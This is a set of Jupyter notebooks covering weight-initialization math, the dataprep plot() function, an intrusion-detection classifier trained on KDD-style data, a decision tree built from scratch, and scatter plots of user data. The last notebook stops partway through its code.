\mathrm{Var}[Z^{[i]}] = \mathrm{Var}[X]\prod_{j=0}^{i-1}n^{[j]}\mathrm{Var}[W^{[j]}]\\ # \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[i]}}\Bigg] = \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[L]}}\Bigg]\prod_{j = i}^{L - 1}n^{[j + 1]}\mathrm{Var}[W^{[j]}]\\ # \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial W^{[i]}}\Bigg] = \mathrm{Var}[Z^{[i]}]\mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[i]}}\Bigg] # \end{equation} # # From the perspective of the forward pass we wish # # \begin{equation} # \forall\ (i, j):\ \mathrm{Var}[Z^{[i]}] = \mathrm{Var}[Z^{[j]}] # \end{equation} # # And from the back prop point of view we want # # \begin{equation} # \forall\ (i, j):\ \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[i]}}\Bigg] = \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[j]}}\Bigg] # \end{equation} # # These two constraints can be easily satisfied if # # 
\begin{equation} # \forall\ i:\ n^{[i]}\mathrm{Var}[W^{[i]}] = \mathrm{Var}[X] = 1\\ # \forall\ i:\ n^{[i + 1]}\mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[i]}}\Bigg] = \mathrm{Var}\Bigg[\frac{\partial\mathscr{L}}{\partial Z^{[L]}}\Bigg] = 1 # \end{equation} # # From these two equations we finally get # # \begin{equation} # \mathrm{Var}[W^{[i]}] = \frac{1}{n^{[i]}} = \frac{1}{fan_{in}} \\ # \mathrm{Var}[W^{[i]}] = \frac{1}{n^{[i + 1]}} = \frac{1}{fan_{out}} # \end{equation} # # As a compromise for cases when $fan_{in} \neq fan_{out}$ # # \begin{equation} # \mathrm{Var}[W^{[i]}] = \frac{2}{fan_{in} + fan_{out}} # \end{equation} # + [markdown] id="RFYrZj0YRam1" colab_type="text" # ## Conclusions # # Without appropriate choice of activation function and/or smart initialization for it neural networks, especially deep ones, tend to refuse training at all. Better activation functions and better initialization strategies are tightly related, so that they complement each other and evolve together. Once popular sigmoid non-linearity turned out to be impractical to use in hidden layers, and now is only used in the output layer for binary classification, while tanh that can be expressed in terms of sigmoid, is still useful for hidden layers. At the first glance initialization strategies seem some wisdom sent from heaven, but at least in case of LeCun and Xavier initialization their derivations are in fact straightforward. All you need to know is where to start and what assumptions to make.
_notebooks/2020-07-31-An-Overview-of-Activations-and-Initializations-for-Deep-Neural-Networks,-Part-1.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # `plot()`: analyze distributions # ## Overview # The function `plot()` explores the distributions and statistics of the dataset. It generates a variety of visualizations and statistics which enables the user to achieve a comprehensive understanding of the column distributions and their relationships. The following describes the functionality of `plot()` for a given dataframe `df`. # # 1. `plot(df)`: plots the distribution of each column and computes dataset statistics # 2. `plot(df, col1)`: plots the distribution of column `col1` in various ways, and computes its statistics # 3. `plot(df, col1, col2)`: generates plots depicting the relationship between columns `col1` and `col2` # # The generated plots are different for numerical, categorical and geography columns. The following table summarizes the output for the different column types. 
# # | `col1` | `col2` | Output | # | --- | --- | --- | # | None | None | dataset statistics, [histogram](https://www.wikiwand.com/en/Histogram) or [bar chart](https://www.wikiwand.com/en/Bar_chart) for each column | # | Numerical | None | column statistics, histogram, [kde plot](https://www.wikiwand.com/en/Kernel_density_estimation), [qq-normal plot](https://www.wikiwand.com/en/Q%E2%80%93Q_plot), [box plot](https://www.wikiwand.com/en/Box_plot) | # | Categorical | None | column statistics, bar chart, [pie chart](https://www.wikiwand.com/en/Pie_chart), [word cloud](https://www.wikiwand.com/en/Tag_cloud), word frequencies | # | Geography | None | column statistics, bar chart, [pie chart](https://www.wikiwand.com/en/Pie_chart), [word cloud](https://www.wikiwand.com/en/Tag_cloud), word frequencies, world map | # | Numerical | Numerical | [scatter plot](https://www.wikiwand.com/en/Scatter_plot), [hexbin plot](https://www.data-to-viz.com/graph/hexbinmap.html), binned box plot| # | Numerical | Categorical | categorical box plot, multi-[line chart](https://www.wikiwand.com/en/Line_chart) | # | Categorical | Numerical | categorical box plot, multi-line chart # | Categorical | Categorical | [nested bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Categorical | Geography | [nested bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Geography | Categorical | [nested bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Geopoint | Categorical | [nested bar 
chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Categorical | Geopoint | [nested bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [stacked bar chart](https://www.wikiwand.com/en/Bar_chart#/Grouped_and_stacked), [heat map](https://www.wikiwand.com/en/Heat_map) | # | Numerical | Geography | categorical box plot, multi-[line chart](https://www.wikiwand.com/en/Line_chart), world map | # | Geography | Numerical | categorical box plot, multi-[line chart](https://www.wikiwand.com/en/Line_chart), world map | # | Numerical | Geopoint | geo map| # | Geopoint | Numerical | geo map| # # Next, we demonstrate the functionality of `plot()`. # ## Load the dataset # `dataprep.eda` supports **Pandas** and **Dask** dataframes. Here, we will load the well-known [adult dataset](http://archive.ics.uci.edu/ml/datasets/Adult) into a Pandas dataframe using the load_dataset function. from dataprep.datasets import load_dataset import numpy as np df = load_dataset('adult') df = df.replace(" ?", np.NaN) # ## Get an overview of the dataset with `plot(df)` # We start by calling `plot(df)` which computes dataset-level statistics, a histogram for each numerical column, and a bar chart for each categorical column. The number of bins in the histogram can be specified with the parameter `bins`, and the number of categories in the bar chart can be specified with the parameter `ngroups`. If a column contains missing values, the percent of missing values is shown in the title and ignored when generating the plots. from dataprep.eda import plot plot(df) # ## Understand a column with `plot(df, col1)` # # After getting an overview of the dataset, we can thoroughly investigate a column of interest `col1` using `plot(df, col1)`. The output is of `plot(df, col1)` is different for numerical and categorical columns. 
# # When `col1` is a numerical column, it computes column statistics, and generates a histogram, kde plot, box plot and qq-normal plot: plot(df, "age") # When `x` is a categorical column, it computes column statistics, and plots a bar chart, pie chart, word cloud, word frequency and word length: plot(df, "education") # When `x` is a Geography column, it computes column statistics, and plots a bar chart, pie chart, word cloud, word frequency, word length and world map: df_geo = load_dataset('countries') plot(df_geo, "Country") # ## Understand the relationship between two columns with `plot(df, col1, col2)` # # Next, we can explore the relationship between columns `col1` and `col2` using `plot(df, col1, col2)`. The output depends on the types of the columns. # # When `col1` and `col2` are both numerical columns, it generates a scatter plot, hexbin plot and box plot: plot(df, "age", "hours-per-week") # When `col1` and `col2` are both categorical columns, it plots a nested bar chart, stacked bar chart and heat map: plot(df, "education", "marital-status") # When `col1` and `col2` are one each of type numerical and categorical, it generates a box plot per category and a multi-line chart: plot(df, "age", "education") # or plot(df, "education", "age") # When `col1` and `col2` are one each of type geopoint and categorical, or, geography and categorical, it generates a box plot per category and a multi-line chart: # + from dataprep.eda.dtypes_v2 import LatLong covid = load_dataset('covid19') latlong = LatLong("Lat", "Long") # create geopoint type using "LatLong" function by inputing two columns names plot(covid, latlong, "Country/Region") # or plot(covid, "Country/Region", latlong) plot(df_geo,"Country", "Region") # or plot(df_geo, "Region", "Country") # - # When `col1` and `col2` are one each of type geography and numerical, it generates a box plot per category, a multi-line chart and a world map: plot(df_geo,"Country", "Population") # or plot(df_geo, "Population", 
"Country") # When `col1` and `col2` are one each of type geopoint and numerical, it generates a geo map: plot(covid, latlong, "2/16/2020") # or plot(covid, "2/16/2020", latlong)
docs/source/user_guide/eda/plot.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

import numpy as np
import pandas as pd

# Headerless network-intrusion train/test dumps; column names assigned below.
network_data = pd.read_csv("E:\data_science_classes\Train.txt", header = None)
network_test = pd.read_csv("E:\data_science_classes\Test.txt", header = None)

# Field names for the raw columns (KDD-style features plus the attack label).
list_col = ["duration","protocol_type","service","flag","src_bytes","dst_bytes","land",
            "wrong_fragment","urgent","hot","num_failed_logins","logged_in",
            "num_compromised","root_shell","su_attempted","num_root","num_file_creations",
            "num_shells","num_access_files","num_outbound_cmds","is_host_login",
            "is_guest_login","count","srv_count","serror_rate", "srv_serror_rate",
            "rerror_rate","srv_rerror_rate","same_srv_rate", "diff_srv_rate",
            "srv_diff_host_rate","dst_host_count","dst_host_srv_count","dst_host_same_srv_rate",
            "dst_host_diff_srv_rate","dst_host_same_src_port_rate",
            "dst_host_srv_diff_host_rate","dst_host_serror_rate","dst_host_srv_serror_rate",
            "dst_host_rerror_rate","dst_host_srv_rerror_rate","attack", "last_flag"]

network_data.rename(columns= { k:v for (k,v) in zip(network_data.columns, list_col)}, inplace = True)
network_test.rename(columns= { k:v for (k,v) in zip(network_test.columns, list_col)}, inplace = True)

# Attack-name groupings used to collapse the textual label into 5 classes.
dos =["back", "land" , "neptune", "pod", "smurf", "teardrop", "apache2", "udpstorm", "processtable", "worm"]
probe = ["satan","ipsweep", "nmap", "portsweep", "mscan", "saint"]
r2l =["guess_passwd","ftp_write","imap","phf","multihop","warezmaster","warezclient","spy","xlock","xsnoop","snmpguess","snmpgetattack","httptunnel","sendmail","named"]
u2r = ["buffer_overflow", "loadmodule", "rootkit", "perl","sqlattack", "xterm","ps","mailbomb"]

# Encode the label: 0 = normal, 1 = DoS, 2 = probe, 3 = R2L, 4 = U2R.
# Labels in none of the groups are left unchanged.
for i in list(network_data.index):
    if list(network_data.loc[[i],["attack"]].attack)[0] == "normal":
        network_data.loc[[i],["attack"]] = 0
    elif list(network_data.loc[[i],["attack"]].attack)[0] in dos:
        network_data.loc[[i],["attack"]] = 1
    elif list(network_data.loc[[i],["attack"]].attack)[0] in probe:
        network_data.loc[[i],["attack"]] = 2
    elif list(network_data.loc[[i],["attack"]].attack)[0] in r2l:
        network_data.loc[[i],["attack"]] = 3
    elif list(network_data.loc[[i],["attack"]].attack)[0] in u2r:
        network_data.loc[[i],["attack"]] = 4

for i in list(network_test.index):
    if list(network_test.loc[[i],["attack"]].attack)[0] == "normal":
        network_test.loc[[i],["attack"]] = 0
    elif list(network_test.loc[[i],["attack"]].attack)[0] in dos:
        network_test.loc[[i],["attack"]] = 1
    elif list(network_test.loc[[i],["attack"]].attack)[0] in probe:
        network_test.loc[[i],["attack"]] = 2
    elif list(network_test.loc[[i],["attack"]].attack)[0] in r2l:
        network_test.loc[[i],["attack"]] = 3
    elif list(network_test.loc[[i],["attack"]].attack)[0] in u2r:
        network_test.loc[[i],["attack"]] = 4

# Split columns by dtype: object columns are treated as categorical, the rest numeric.
cat_col = []
num_col = []
for i in network_data.columns:
    if network_data[i].dtype.name in ['object']:
        cat_col.append(i)
    else:
        num_col.append(i)
num_col.remove("attack")  # the target is not a feature

def outlier_treat(x,y):
    """Winsorize each column named in *x* of frame *y*, in place, at the
    1st/99th percentiles.

    FIX: Series.clip_upper/clip_lower were deprecated in pandas 0.24 and
    removed in 1.0; Series.clip(upper=...)/clip(lower=...) is the
    supported equivalent with identical results.
    """
    for i in x:
        y[i]= y[i].clip(upper=y[i].quantile(0.99))
        y[i]= y[i].clip(lower=y[i].quantile(0.01))

outlier_treat(num_col,network_data)
outlier_treat(num_col,network_test)

def drop_0(j):
    """Drop, in place, every column of *j* holding a single constant value."""
    for i in j.columns:
        k = list(j[i].value_counts())
        if len(k)==1:
            j.drop(i, axis = 1, inplace = True)

drop_0(network_data)
network_data.shape

# Keep the test frame aligned with whatever survived in train.
network_test = network_test[network_data.columns]

## Categorical Variable chi square test for variable selection
import scipy.stats as stats
chisq_df = pd.DataFrame()
for i in cat_col:
    cross_tab = pd.crosstab(network_data[i],network_data['attack'], margins=False)
    # Run the test once and reuse the result (it was previously recomputed
    # three times per column); [0] is the statistic, [1] the p-value.
    chi2_res = stats.chi2_contingency(observed=cross_tab)
    temp = pd.DataFrame([i,chi2_res[0],chi2_res[1]]).T
    temp.columns = ['Variable', 'ChiSquare','P-Value']
    chisq_df = pd.concat([chisq_df, temp], axis=0, ignore_index=True)
chisq_df

## Numerical Variable t test for
# variable selection
# (continuation of the "Numerical Variable t test for variable selection" heading)

# Two-sample t-test of each numeric feature between class 1 (DoS) and
# class 0 (normal) rows; a low p-value means the feature separates them.
tstats_df = pd.DataFrame()
for i in num_col:
    tstats = stats.ttest_ind(network_data[network_data['attack']==1][i],network_data[network_data['attack']==0][i])
    temp = pd.DataFrame([i, tstats[0], tstats[1]]).T
    temp.columns = ['Variable Name', 'T-Statistic', 'P-Value']
    tstats_df = pd.concat([tstats_df, temp], axis=0, ignore_index=True)
tstats_df

# Candidate drops: features whose means do not differ significantly (p > 0.05).
drop_ttest_col = list(tstats_df[tstats_df["P-Value"] >0.05]["Variable Name"])
drop_ttest_col

# +
#checking log likelihood
# -

import statsmodels.formula.api as sm

# Univariate logistic regression of attack (class 1 vs class 0 rows only) on
# each numeric feature; the fitted log-likelihood ranks explanatory power.
llf_df = pd.DataFrame()
for i in num_col:
    # NOTE(review): data1 is loop-invariant and could be built once outside the loop.
    data1 = pd.concat([network_data[network_data["attack"] == 1],network_data[network_data["attack"] == 0]], axis = 0)
    logreg = sm.logit(formula ="attack~" +i, data=data1)
    result = logreg.fit()
    summ = result.summary()  # NOTE(review): computed but never used
    temp = pd.DataFrame([i, result.llf]).T
    temp.columns = ['Variable Name','Log-Likelihood Full']
    llf_df = pd.concat([llf_df, temp], axis=0)

llf_df.sort_values(by = "Log-Likelihood Full").head(8)

def dummies(k,j):
    # One-hot encode each column name in *k* from frame *j*; returns a list
    # of dummy frames, all dummy columns prefixed with "d".
    x= []
    for i in k:
        x.append(pd.get_dummies(j[i], prefix ="d"))
    return(x)

cat_dum = dummies(cat_col,network_data)
cat_dum_t = dummies(cat_col,network_test)

cat_dum_df = pd.DataFrame(pd.concat(cat_dum, axis=1))
cat_dum_t_df = pd.DataFrame(pd.concat(cat_dum_t, axis=1))

num_df = network_data[num_col]
num_t_df = network_test[num_col]
num_t_df.head()

# Assemble modelling frames: dummies + numeric features, then append the target.
new_network_data= pd.concat([cat_dum_df,num_df], axis=1)
new_network_test= pd.concat([cat_dum_t_df,num_t_df], axis=1)
print(new_network_data.shape)
print(new_network_test.shape)

new_network_data= pd.concat([new_network_data,network_data.attack], axis=1)
new_network_test= pd.concat([new_network_test,network_test.attack], axis=1)

# Keep only columns present in BOTH frames (dummy columns can differ because
# train and test may contain different category levels).
common_var = []
for i in new_network_test.columns:
    if i in new_network_data.columns:
        common_var.append(i)
new_network_test = new_network_test[common_var]
new_network_data = new_network_data[common_var]

#multi colinear from pandas profiling
drp_col = ["dst_host_rerror_rate","dst_host_srv_rerror_rate","dst_host_serror_rate",
"dst_host_srv_serror_rate","srv_serror_rate","srv_rerror_rate","d_S0"]
new_network_data.drop(drp_col,axis=1,inplace= True)
new_network_test.drop(drp_col,axis=1,inplace= True)
print(new_network_data.shape)
print(new_network_test.shape)

import seaborn as sns

# Pairwise correlations of the remaining training columns.
corr_all = new_network_data.corr()
sns.heatmap(corr_all)

# Correlation of every feature with the target column.
corr_y = corr_all["attack"]
corr_y_df = pd.DataFrame(corr_y)
corr_y_df.head()

# Absolute value: the sign of the correlation is irrelevant for selection.
corr_y_df["attack"] = np.abs(corr_y_df["attack"])
corr_y_df.head(7)

corr_y_df = corr_y_df.sort_values(by= "attack", ascending= True)
corr_y_df.head(5)

corr_y_df.reset_index(inplace = True)
corr_y_df.head()

# Collect names of features with |corr| < 0.01 against the target.
# NOTE(review): the inner scan matches by value, so exact ties would be
# appended more than once.
drop_corr = []
for i in list(corr_y_df.attack):
    if i < 0.01:
        for k in corr_y_df.index:
            if corr_y_df.loc[k,"attack"] == i:
                drop_corr.append(corr_y_df.loc[k,"index"])

for i in drop_corr:
    new_network_data.drop(i, inplace = True, axis = 1)
new_network_data.shape

#selecting all columns except y column
feature_columns = new_network_data.columns.difference( ["attack"] )

#splitting test and train data
train_X = new_network_data[feature_columns]
test_X = new_network_test[feature_columns]
train_y = new_network_data["attack"]
test_y = new_network_test["attack"]

# ### making model using sklearn

from sklearn.linear_model import LogisticRegression
logreg = LogisticRegression()
logreg.fit( train_X, train_y )
logreg.predict(test_X)

#Predicting the test cases
network_test_pred = pd.DataFrame({ 'actual': test_y, 'predicted': logreg.predict(test_X)})
network_test_pred.sample(10)

# Creating a confusion matrix
from sklearn import metrics
cm = metrics.confusion_matrix(network_test_pred.actual, network_test_pred.predicted)
cm

import matplotlib.pyplot as plt
import seaborn as sbn
# %matplotlib inline

# Annotated heat map of the logistic-regression confusion matrix.
sbn.heatmap(cm, annot=True, fmt='.2f', xticklabels = ["normal","dos ","probe","r2l","u2r"] , yticklabels = ["normal","dos","probe","r2l","u2r"] )
plt.ylabel('True label')
plt.xlabel('Predicted label')

import sklearn.metrics as metrics
#also using sklearn.metrics
score = metrics.accuracy_score( network_test_pred.actual, network_test_pred.predicted )
score

# ### making model using decision tree

import sklearn.tree as dt
import sklearn.ensemble as en
from sklearn import metrics
from sklearn.tree import DecisionTreeClassifier, export_graphviz, export

# Rebuild the full (pre-correlation-filter) frames for the tree model.
dt_network_data= pd.concat([cat_dum_df,num_df], axis=1)
dt_network_test= pd.concat([cat_dum_t_df,num_t_df], axis=1)
dt_network_data= pd.concat([dt_network_data,network_data.attack], axis=1)
dt_network_test= pd.concat([dt_network_test,network_test.attack], axis=1)

# Align train/test columns again, as above.
common_var = []
for i in dt_network_test.columns:
    if i in dt_network_data.columns:
        common_var.append(i)
dt_network_data=dt_network_data[common_var]
dt_network_test=dt_network_test[common_var]

#selecting all columns except y column
feature_columns_dt = dt_network_data.columns.difference( ["attack"] )

train_X_dt = dt_network_data[feature_columns_dt]
test_X_dt = dt_network_test[feature_columns_dt]
train_y_dt = dt_network_data["attack"]
test_y_dt = dt_network_test["attack"]

# First pass: a tree with hand-picked hyper-parameters.
network_data_tree = DecisionTreeClassifier( max_depth = 15,max_features= 90 )
network_data_tree.fit( train_X_dt, train_y_dt )

tree_test_pred = pd.DataFrame( { 'actual': test_y_dt, 'predicted': network_data_tree.predict( test_X_dt ) } )
metrics.accuracy_score( tree_test_pred.actual, tree_test_pred.predicted )

cm_dt = metrics.confusion_matrix(tree_test_pred.actual,tree_test_pred.predicted )
cm_dt

sbn.heatmap(cm_dt, annot=True, fmt='.2f', xticklabels = ["normal","dos ","probe","r2l","u2r"] , yticklabels = ["normal","dos","probe","r2l","u2r"])
plt.ylabel('True label')
plt.xlabel('Predicted label')

# +
#fine tuning the parameters
# -

# Exhaustive grid search (10-fold CV) over depth and feature count.
from sklearn.model_selection import GridSearchCV
param_grid = {'max_depth': np.arange(9, 20), 'max_features': np.arange(70,90)}
tree = GridSearchCV(DecisionTreeClassifier(), param_grid, cv = 10)
tree.fit( train_X_dt, train_y_dt )
tree.best_params_
tree.best_score_

# Refit with the best parameters found above.
new_network_data_tree = DecisionTreeClassifier( max_depth = 18, max_features = 85)
# Fit the tuned decision tree and evaluate it on the held-out test split.
new_network_data_tree.fit(train_X_dt, train_y_dt)

# Actual vs. predicted labels side by side for inspection.
tuned_predictions = new_network_data_tree.predict(test_X_dt)
new_tree_test_pred = pd.DataFrame({'actual': test_y_dt, 'predicted': tuned_predictions})

# Overall test-set accuracy of the tuned tree.
metrics.accuracy_score(new_tree_test_pred.actual, new_tree_test_pred.predicted)

# Confusion matrix over the five traffic classes.
new_cm_dt = metrics.confusion_matrix(new_tree_test_pred.actual, new_tree_test_pred.predicted)
new_cm_dt

# Annotated heat-map rendering of the confusion matrix.
axis_labels_x = ["normal","dos ","probe","r2l","u2r"]
axis_labels_y = ["normal","dos","probe","r2l","u2r"]
sbn.heatmap(new_cm_dt, annot=True, fmt='.2f', xticklabels=axis_labels_x, yticklabels=axis_labels_y)
plt.ylabel('True label')
plt.xlabel('Predicted label')
3_multinomial_NETWORK INTRUSION DETECTION.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# The goal of this notebook is to code a decision tree classifier that can be used with the following API.

# + active=""
# df = pd.read_csv("data.csv")

# + active=""
# train_df, test_df = train_test_split(df, test_size=0.2)
# tree = decision_tree_algorithm(train_df)
# accuracy = calculate_accuracy(test_df, tree)
# -

# # Import Statements

# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline

import random
from pprint import pprint
# -

# # Load and Prepare Data

# #### Format of the data
# - last column of the data frame must contain the label and it must also be called "label"
# - there should be no missing values in the data frame

df = pd.read_csv("Iris.csv")
df = df.drop("Id", axis=1)
df = df.rename(columns={"species": "label"})
df.head()

# # Train-Test-Split

def train_test_split(df, test_size):
    """Randomly split *df* into (train_df, test_df).

    test_size may be an absolute row count (int) or a fraction of the
    frame (float); a fraction is first converted to a rounded count.
    Sampling uses the `random` module, so `random.seed(...)` makes the
    split reproducible.
    """
    if isinstance(test_size, float):
        test_size = round(test_size * len(df))

    indices = df.index.tolist()
    test_indices = random.sample(population=indices, k=test_size)

    test_df = df.loc[test_indices]
    train_df = df.drop(test_indices)

    return train_df, test_df

random.seed(0)
train_df, test_df = train_test_split(df, test_size=20)

# # Helper Functions

# The helpers below operate on the raw numpy array; the label is always
# the last column.
data = train_df.values
data[:5]

# ### Data pure?

def check_purity(data):
    """Return True when every row of *data* carries the same label.

    Simplified from an if/else that returned the literals True/False.
    """
    label_column = data[:, -1]
    unique_classes = np.unique(label_column)
    return len(unique_classes) == 1

# ### Classify

def classify_data(data):
    """Return the most frequent label in *data*.

    Ties are resolved by np.unique's sorted order (argmax takes the first
    maximal count).
    """
    label_column = data[:, -1]
    unique_classes, counts_unique_classes = np.unique(label_column, return_counts=True)

    index = counts_unique_classes.argmax()
    classification = unique_classes[index]

    return classification

# ### Potential splits?
def get_potential_splits(data):
    """Return {column_index: [candidate split values]} for every feature.

    Candidates are the midpoints between consecutive unique values of each
    feature column; the last column (the label) is excluded.
    """
    potential_splits = {}
    _, n_columns = data.shape
    for column_index in range(n_columns - 1):  # excluding the label column
        potential_splits[column_index] = []
        unique_values = np.unique(data[:, column_index])
        for index in range(1, len(unique_values)):
            current_value = unique_values[index]
            previous_value = unique_values[index - 1]
            potential_splits[column_index].append((current_value + previous_value) / 2)
    return potential_splits

# ### Split Data

def split_data(data, split_column, split_value):
    """Partition *data* into rows <= *split_value* and rows > *split_value*."""
    split_column_values = data[:, split_column]
    data_below = data[split_column_values <= split_value]
    data_above = data[split_column_values > split_value]
    return data_below, data_above

# ### Lowest Overall Entropy?

def calculate_entropy(data):
    """Shannon entropy (in bits) of the label column of *data*."""
    _, counts = np.unique(data[:, -1], return_counts=True)
    probabilities = counts / counts.sum()
    return sum(probabilities * -np.log2(probabilities))

def calculate_overall_entropy(data_below, data_above):
    """Size-weighted entropy of a two-way partition."""
    n = len(data_below) + len(data_above)
    p_data_below = len(data_below) / n
    p_data_above = len(data_above) / n
    return (p_data_below * calculate_entropy(data_below)
            + p_data_above * calculate_entropy(data_above))

def determine_best_split(data, potential_splits):
    """Return (best_split_column, best_split_value) minimising overall entropy.

    Returns (None, None) when *potential_splits* holds no candidates
    (previously this case raised UnboundLocalError).
    """
    # float("inf") replaces the magic sentinel 9999, which would silently
    # misbehave for entropies above that value — impossible here, but fragile.
    overall_entropy = float("inf")
    best_split_column = None
    best_split_value = None
    for column_index in potential_splits:
        for value in potential_splits[column_index]:
            data_below, data_above = split_data(data, split_column=column_index, split_value=value)
            current_overall_entropy = calculate_overall_entropy(data_below, data_above)
            if current_overall_entropy <= overall_entropy:
                overall_entropy = current_overall_entropy
                best_split_column = column_index
                best_split_value = value
    return best_split_column, best_split_value

# # Decision Tree Algorithm

# ### Representation of the Decision Tree

# + active=""
# sub_tree = {question: [yes_answer, no_answer]}
# -

example_tree = {"petal_width <= 0.8": ["Iris-setosa",
                                       {"petal_width <= 1.65": [{"petal_length <= 4.9": ["Iris-versicolor",
                                                                                         "Iris-virginica"]},
                                                                "Iris-virginica"]}]}

# ### Algorithm

def decision_tree_algorithm(df, counter=0, min_samples=2, max_depth=5):
    """Recursively build a decision tree from *df*.

    The tree is a nested dict {question: [yes_answer, no_answer]}; a leaf is
    the classification value itself. *min_samples* and *max_depth* bound the
    recursion. The first call receives a DataFrame; recursive calls pass the
    underlying numpy array.
    """
    # data preparation: remember the column names globally so recursive calls
    # (which only see the numpy array) can still format questions.
    if counter == 0:
        global COLUMN_HEADERS
        COLUMN_HEADERS = df.columns
        data = df.values
    else:
        data = df

    # base cases: pure node, too few samples, or maximum depth reached
    if (check_purity(data)) or (len(data) < min_samples) or (counter == max_depth):
        return classify_data(data)

    # recursive part
    counter += 1
    potential_splits = get_potential_splits(data)
    split_column, split_value = determine_best_split(data, potential_splits)
    data_below, data_above = split_data(data, split_column, split_value)

    # instantiate sub-tree
    feature_name = COLUMN_HEADERS[split_column]
    question = "{} <= {}".format(feature_name, split_value)
    sub_tree = {question: []}

    # find answers (recursion)
    yes_answer = decision_tree_algorithm(data_below, counter, min_samples, max_depth)
    no_answer = decision_tree_algorithm(data_above, counter, min_samples, max_depth)

    # If both answers agree there is no point in asking the question. This
    # happens when an impure node is classified anyway (min_samples or
    # max_depth base case).
    if yes_answer == no_answer:
        sub_tree = yes_answer
    else:
        sub_tree[question].append(yes_answer)
        sub_tree[question].append(no_answer)
    return sub_tree

tree = decision_tree_algorithm(train_df, max_depth=3)
pprint(tree)

# # Classification

# + active=""
# sub_tree = {question: [yes_answer, no_answer]}
# -

example = test_df.iloc[0]
example

def classify_example(example, tree):
    """Route one *example* (a row) through *tree*; return the predicted label."""
    question = list(tree.keys())[0]
    # rsplit with maxsplit=2 keeps feature names containing spaces intact;
    # a plain split(" ") would over-unpack such questions.
    feature_name, comparison_operator, value = question.rsplit(" ", 2)

    # ask the question
    if example[feature_name] <= float(value):
        answer = tree[question][0]
    else:
        answer = tree[question][1]

    # base case: a leaf holds the classification itself
    if not isinstance(answer, dict):
        return answer
    # recursive part: descend into the residual sub-tree
    return classify_example(example, answer)

classify_example(example, tree)

# # Calculate Accuracy

def calculate_accuracy(df, tree):
    """Fraction of rows in *df* whose prediction matches the "label" column.

    Note: adds "classification" and "classification_correct" columns to *df*
    as a side effect.
    """
    df["classification"] = df.apply(classify_example, axis=1, args=(tree,))
    df["classification_correct"] = df["classification"] == df["label"]
    return df["classification_correct"].mean()

accuracy = calculate_accuracy(test_df, tree)
accuracy
handling only continuous variables.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python [conda env:python3]
#     language: python
#     name: conda-env-python3-py
# ---

# # Table of Contents
#
# [Preparation](#preparation)
#
# [User data vectors](#userdatavectors)
#
# [Graphs](#graphs)

# # Preparation
# <a id=preparation />

# Pulls in getAllUserVectorData / getAllResponders / FloatProgress etc.
# %run "../Functions/4. User comparison.ipynb"

# # Data vectors of users
# <a id=userdatavectors />

# +
# small sample
#allData = getAllUserVectorData( getAllUsers()[:10] )
# complete set
#allData = getAllUserVectorData( getAllUsers() )
# subjects which answered the gform
#allData = getAllUserVectorData( getAllResponders()[:10] )
allData = getAllUserVectorData( getAllResponders() )
# -

allData

# # Graphs
# <a id=graphs />

# Transpose so that each metric becomes a column.
columnAllData = allData.T

columnAllData['scorebefore'][:5]

plt.plot(columnAllData['craft'], columnAllData['equip'], 'ro')
plt.xlabel('craft')
plt.ylabel('equip')

plt.plot(columnAllData['sessionsCount'], columnAllData['craft'], 'ro')
plt.xlabel('sessionsCount')
plt.ylabel('craft')

columnAllData.columns

for column in columnAllData.columns:
    print(column)

columnAllData.columns[1]

len(columnAllData.columns)

# Enumerate every unordered pair of columns (the pairs to be plotted).
for i in range(1, len(columnAllData.columns)):
    for j in range(i + 1, len(columnAllData.columns)):
        print(i, j)
        print(columnAllData.columns[i], columnAllData.columns[j])

def plotFromAllUsersData(allUsersData, xcolumnname, ycolumnname):
    """Scatter-plot column *ycolumnname* against *xcolumnname* of *allUsersData*."""
    plt.title("plotting '" + ycolumnname + "' against '" + xcolumnname + "'")
    plt.plot( allUsersData[xcolumnname], allUsersData[ycolumnname], 'ro' )
    plt.xlabel(xcolumnname)
    plt.ylabel(ycolumnname)
    #plt.show()

plotFromAllUsersData( columnAllData, columnAllData.columns[1], columnAllData.columns[2] )

# # Subplot tests

# +
plt.figure(1)

#plt.subplot(131)
plt.subplot(311)
plotFromAllUsersData( columnAllData, columnAllData.columns[2], columnAllData.columns[3] )
plt.grid(True)

#plt.subplot(132)
# Fix: was plt.subplot(321) — a digit transposition made while converting the
# 1x3 layout (131/132/133) to a 3x1 stack; 321 selects a different grid and
# overlaps the first axes. The stacked layout is 311/312/313.
